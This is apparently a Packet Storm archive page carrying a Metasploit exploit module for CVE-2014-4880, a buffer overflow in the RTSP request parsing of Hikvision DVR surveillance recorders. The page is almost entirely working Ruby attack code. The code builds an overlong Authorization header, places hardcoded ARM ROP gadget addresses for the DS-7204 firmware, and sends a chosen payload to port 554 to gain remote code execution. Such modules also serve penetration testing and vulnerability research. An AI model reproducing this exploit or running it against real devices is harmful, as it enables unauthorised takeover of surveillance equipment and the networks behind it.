what you don't know can hurt you

Hikvision DVR RTSP Request Remote Code Execution

Hikvision DVR RTSP Request Remote Code Execution
Posted Nov 20, 2014
Authored by Mark Schloesser | Site metasploit.com

This Metasploit module exploits a buffer overflow in the RTSP request parsing code of Hikvision DVR appliances. The Hikvision DVR devices record video feeds of surveillance cameras and offer remote administration and playback of recorded footage. The vulnerability is present in several models / firmware versions but due to the available test device this module only supports the DS-7204 model.

tags | exploit, remote, overflow
advisories | CVE-2014-4880
MD5 | 8b5fd312a339e0a4af823684bf4c92bf

Hikvision DVR RTSP Request Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking

include Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Hikvision DVR RTSP Request Remote Code Execution',
'Description' => %q{
This module exploits a buffer overflow in the RTSP request parsing
code of Hikvision DVR appliances. The Hikvision DVR devices record
video feeds of surveillance cameras and offer remote administration
and playback of recorded footage.

The vulnerability is present in several models / firmware versions
but due to the available test device this module only supports
the DS-7204 model.
},
'Author' =>
[
'Mark Schloesser <mark_schloesser[at]rapid7.com>', # @repmovsb, vulnerability analysis & exploit dev
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-4880' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities' ]
],
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Privileged' => true,
'Targets' =>
[
#
# ROP targets are difficult to represent in the hash, use callbacks instead
#
[ "DS-7204 Firmware V2.2.10 build 131009", {

# The callback handles all target-specific settings
:callback => :target_ds7204_1,
'g_adjustesp' => 0x002c828c,
# ADD SP, SP, #0x350
# LDMFD SP!, {R4-R6,PC}

'g_r3fromsp' => 0x00446f80,
# ADD R3, SP, #0x60+var_58
# BLX R6

'g_blxr3_pop' => 0x00456360,
# BLX R3
# LDMFD SP!, {R1-R7,PC}

'g_popr3' => 0x0000fe98,
# LDMFD SP!, {R3,PC}
} ],

[ "Debug Target", {

# The callback handles all target-specific settings
:callback => :target_debug

} ]

],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 19 2014'))

register_options(
[
Opt::RPORT(554)
], self.class)
end

def exploit
unless self.respond_to?(target[:callback])
fail_with(Failure::NoTarget, "Invalid target specified: no callback function defined")
end

device_rop = self.send(target[:callback])

request = "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"
request << "CSeq: 7\r\n"
request << "Authorization: Basic "
request << rand_text_alpha(0x280 + 34)
request << [target["g_adjustesp"]].pack("V")[0..2]
request << "\r\n\r\n"
request << rand_text_alpha(19)

# now append the ropchain
request << device_rop
request << rand_text_alpha(8)
request << payload.encoded

connect
sock.put(request)
disconnect
end

# These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc
def target_ds7204_1
# Create a fixed-size buffer for the rop chain
ropbuf = rand_text_alpha(24)

# CHAIN = [
# 0, #R4 pop adjustsp
# 0, #R5 pop adjustsp
# GADGET_BLXR3_POP, #R6 pop adjustsp
# GADGET_POPR3,
# 0, #R3 pop
# GADGET_R3FROMSP,
# ]

ropbuf[8,4] = [target["g_blxr3_pop"]].pack("V")
ropbuf[12,4] = [target["g_popr3"]].pack("V")
ropbuf[20,4] = [target["g_r3fromsp"]].pack("V")

return ropbuf
end

# Generate a buffer that provides a starting point for exploit development
def target_debug
Rex::Text.pattern_create(2000)
end

def rhost
datastore['RHOST']
end

def rport
datastore['RPORT']
end

end
Login or Register to add favorites

File Archive:

April 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    17 Files
  • 2
    Apr 2nd
    2 Files
  • 3
    Apr 3rd
    2 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    15 Files
  • 7
    Apr 7th
    20 Files
  • 8
    Apr 8th
    16 Files
  • 9
    Apr 9th
    5 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    4 Files
  • 13
    Apr 13th
    15 Files
  • 14
    Apr 14th
    27 Files
  • 15
    Apr 15th
    19 Files
  • 16
    Apr 16th
    7 Files
  • 17
    Apr 17th
    1 Files
  • 18
    Apr 18th
    1 Files
  • 19
    Apr 19th
    19 Files
  • 20
    Apr 20th
    18 Files
  • 21
    Apr 21st
    30 Files
  • 22
    Apr 22nd
    18 Files
  • 23
    Apr 23rd
    18 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close